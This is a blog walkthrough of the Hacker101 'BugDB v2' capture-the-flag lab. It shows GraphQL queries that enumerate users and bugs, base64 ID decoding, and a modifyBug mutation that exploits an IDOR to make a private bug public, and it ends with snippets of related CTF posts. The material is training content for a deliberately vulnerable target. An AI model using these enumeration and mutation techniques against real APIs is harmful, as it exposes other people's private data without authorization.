Skip to main content

Hacker 101 CTF Walkthrough: BugDB v2

 This is the second CTF on Hacker 101 related to GraphQL. Let's dive into it.

Learning the trend from previous CTF i.e BugDB v1 I didn't dive into the introspection query graph straightaway this time rather I opened the docs of this GraphQL endpoint which showed that this time we have the feature of mutation as well which means that we can post/modify data on the server. Interesting.

 

Alright, Let's follow the trend and read the docs further in Query

 

We can query for user, find user/bug and also all bugs and all users as well. Let's carve a query out of it that queries most of the data if not all out of the endpoint

 

query{
allUsers{
  edges{
    node{
      id
      username
    }
  }
}
 
    allBugs {
    id
    reporter {
      id
      username
    }
    reporterId
    text
    private
  }

I queried for all the users and bugs (NOTE: I could also have used the "user" object to query for querying all the users). It in response gave me this.

{
  "data": {
    "allUsers": {
      "edges": [
        {
          "node": {
            "id": "VXNlcnM6MQ==",
            "username": "admin"
          }
        },
        {
          "node": {
            "id": "VXNlcnM6Mg==",
            "username": "victim"
          }
        }
      ]
    },
    "allBugs": [
      {
        "id": "QnVnczox",
        "reporter": {
          "id": "VXNlcnM6MQ==",
          "username": "admin"
        },
        "reporterId": 1,
        "text": "This is an example bug",
        "private": false
      }
    ]
  }
}

 

I copied the all the IDs mentioned in the response (encoded in Base64) and decoded them using https://www.base64decode.org/ and got the following output:

 

So the users are numbered as User:1, User:2 and bugs as Bug:1 etc but if you noticed one thing that the bug that we received in the response has attribute private set to false meaning that this bug is marked public so there is a chance that there are private bugs available on this endpoint, what if we can disclose them? 

Now lets have a look at the Mutation's documentation to see what can we do in mutation. 

 

Ok so we can modify the a bug using this mutation on this endpoint of GraphQL but how can this be a security vulnerability? Here's the catch, as we can see that there could be private bugs on the server and if we somehow get their ID we can modify their status from private to public, hence disclosing private bugs, lets convert this theory into action.

We have already seen one bug, I gave it a guess shot that there would be one private bug whose ID will be 2 (After all hacking involves a lot of guess work) and tried to modify its status to public using the following mutation:

mutation{
  modifyBug(id:2, private:false) {
    ok
  }
} 
 

This mutation returned the ok parameter which is a proof that a bug having ID:2 has been set from private to public. Lets see all bugs to check if now we can see the hidden bug or not using 

query{
 
    allBugs {
    id
    reporter {
      id
      username
    }
    reporterId
    text
    private
  }
}


This CTF involved IDOR through which we disclosed private bugs. Happy learning

Labels:

Comments

Post a Comment

Popular posts from this blog

Hacker 101 CTF Walkthrough: Petshop Pro

I am back with another walkthrough to one of the  HackerOne 's CTF Petshop Pro . Let's look at the interface of this web page.
Post a Comment
Read more

Hacker101 CTF Walkthrough: Micro-CMS v1

Here is the walkthrough for another CTF available on  Hacker 101  is Micro-CMS v1 This CTF has four flags and I will walk you off through each one of them. Let's start! This is the main page of the CTF where you have some options like you can create some pages, and read the already created ones. Flag 0: To find the flag0 you need to first create a page with some random content After creating the page, you will be redirected to the page you just created showing the contents. Observe the URL at this moment. It will be something like: http://34.74.105.127/242d57e34e/page/13 Noticing that our page number has been assigned number 13 and by manually changing the page number you can access other pages. Now click on Edit this Page  button in the top right corner. Now observe the URL which will be like http://34.74.105.127/242d57e34e/page/edit/13 So we know now that we can access a page in two ways, by simply hitting the page URL and by hitting the edit page URL.
Post a Comment
Read more